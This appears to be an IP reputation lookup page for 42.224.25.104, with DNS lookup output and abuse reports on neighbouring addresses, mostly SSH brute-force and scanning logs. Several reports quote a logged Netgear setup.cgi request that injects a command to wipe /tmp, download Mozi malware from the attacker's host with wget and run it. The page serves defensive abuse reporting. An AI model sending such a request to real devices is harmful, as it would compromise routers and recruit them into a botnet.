42.224.25.104 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: None

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
42.224.25.179	attack	42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-" ...	2020-10-02 01:42:57
42.224.25.179	attack	42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-" ...	2020-10-01 17:49:36

Type

Details

Datetime

42.224.25.179

attack

42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
...

2020-10-02 01:42:57

42.224.25.179

attack

42.224.25.179 - - \[30/Sep/2020:22:35:46 +0200\] "GET /setup.cgi\?next_file=netgear.cfg\&todo=syscmd\&cmd=rm+-rf+/tmp/\*\;wget+http://42.224.25.179:49461/Mozi.m+-O+/tmp/netgear\;sh+netgear\&curpath=/\¤tsetting.htm=1 HTTP/1.0" 404 162 "-" "-"
...

2020-10-01 17:49:36

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 42.224.25.104
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 18616
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;42.224.25.104.			IN	A

;; AUTHORITY SECTION:
.			367	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021301 1800 900 604800 86400

;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 14 08:43:20 CST 2022
;; MSG SIZE  rcvd: 106

Host info

104.25.224.42.in-addr.arpa domain name pointer hn.kd.ny.adsl.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
104.25.224.42.in-addr.arpa	name = hn.kd.ny.adsl.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
185.234.216.28	attack	CF RAY ID: 5ca6dbe61eaeffc8 IP Class: noRecord URI: //wp-login.php	2020-08-30 00:26:57
112.35.169.163	attackspam	Aug 29 12:57:45 instance-2 sshd[31009]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.35.169.163 Aug 29 12:57:47 instance-2 sshd[31009]: Failed password for invalid user admin from 112.35.169.163 port 13059 ssh2 Aug 29 13:00:25 instance-2 sshd[31056]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.35.169.163	2020-08-30 00:10:10
216.218.206.74	attack	srv02 Mass scanning activity detected Target: 8080(http-alt) ..	2020-08-30 00:24:05
61.177.172.168	attackspambots	Aug 29 17:55:56 db sshd[11217]: User root from 61.177.172.168 not allowed because none of user's groups are listed in AllowGroups ...	2020-08-30 00:19:05
60.246.2.72	attackbotsspam	(imapd) Failed IMAP login from 60.246.2.72 (MO/Macao/nz2l72.bb60246.ctm.net): 1 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_TRIGGER; Logs: Aug 29 16:37:54 ir1 dovecot[3110802]: imap-login: Disconnected (auth failed, 1 attempts in 18 secs): user=, method=PLAIN, rip=60.246.2.72, lip=5.63.12.44, session=	2020-08-30 00:30:33
106.12.72.135	attack	Aug 29 12:08:10 *** sshd[29367]: Invalid user anderson from 106.12.72.135	2020-08-30 00:22:42
51.68.44.13	attack	2020-08-29T14:02:06.460344abusebot-5.cloudsearch.cf sshd[32329]: Invalid user carla from 51.68.44.13 port 33706 2020-08-29T14:02:06.468506abusebot-5.cloudsearch.cf sshd[32329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=13.ip-51-68-44.eu 2020-08-29T14:02:06.460344abusebot-5.cloudsearch.cf sshd[32329]: Invalid user carla from 51.68.44.13 port 33706 2020-08-29T14:02:07.984535abusebot-5.cloudsearch.cf sshd[32329]: Failed password for invalid user carla from 51.68.44.13 port 33706 ssh2 2020-08-29T14:06:23.035961abusebot-5.cloudsearch.cf sshd[32332]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=13.ip-51-68-44.eu user=root 2020-08-29T14:06:24.501538abusebot-5.cloudsearch.cf sshd[32332]: Failed password for root from 51.68.44.13 port 41240 ssh2 2020-08-29T14:10:26.449292abusebot-5.cloudsearch.cf sshd[32334]: Invalid user neeraj from 51.68.44.13 port 48776 ...	2020-08-30 00:29:01
45.252.249.73	attackbotsspam	Unauthorized SSH login attempts	2020-08-30 00:09:38
5.101.59.243	attackspam	1598702888 - 08/29/2020 14:08:08 Host: 5.101.59.243/5.101.59.243 Port: 445 TCP Blocked	2020-08-30 00:23:45
49.233.139.218	attackbots	Aug 29 15:09:44 jane sshd[31412]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.233.139.218 Aug 29 15:09:46 jane sshd[31412]: Failed password for invalid user testuser from 49.233.139.218 port 52572 ssh2 ...	2020-08-30 00:14:10
222.186.173.226	attack	2020-08-29T16:00:30.182043server.espacesoutien.com sshd[29151]: Failed password for root from 222.186.173.226 port 34164 ssh2 2020-08-29T16:00:33.702628server.espacesoutien.com sshd[29151]: Failed password for root from 222.186.173.226 port 34164 ssh2 2020-08-29T16:00:36.969866server.espacesoutien.com sshd[29151]: Failed password for root from 222.186.173.226 port 34164 ssh2 2020-08-29T16:00:41.263036server.espacesoutien.com sshd[29151]: Failed password for root from 222.186.173.226 port 34164 ssh2 ...	2020-08-30 00:07:22
209.65.71.3	attackspambots	Aug 29 16:32:52 gamehost-one sshd[4181]: Failed password for root from 209.65.71.3 port 41563 ssh2 Aug 29 16:38:01 gamehost-one sshd[4518]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209.65.71.3 Aug 29 16:38:02 gamehost-one sshd[4518]: Failed password for invalid user nova from 209.65.71.3 port 50054 ssh2 ...	2020-08-30 00:10:36
159.203.188.175	attackbotsspam	malicious Brute-Force reported by https://www.patrick-binder.de ...	2020-08-30 00:01:35
23.108.46.247	attackspam	34,68-05/05 [bc04/m148] PostRequest-Spammer scoring: oslo	2020-08-30 00:26:44
192.141.107.58	attackspambots	2020-08-29T14:13:01+0200 Failed SSH Authentication/Brute Force Attack. (Server 9)	2020-08-30 00:32:17

Recently Reported IPs

42.224.228.48	42.224.29.124	42.224.247.124	42.224.243.207
42.224.3.166	42.224.28.95	42.224.47.54	42.224.6.52
42.224.67.236	42.224.34.85	42.224.67.247	42.224.71.116
42.224.69.185	42.224.91.208	42.225.192.157	42.225.20.174
42.225.201.188	42.224.94.4	42.224.80.145	42.225.203.77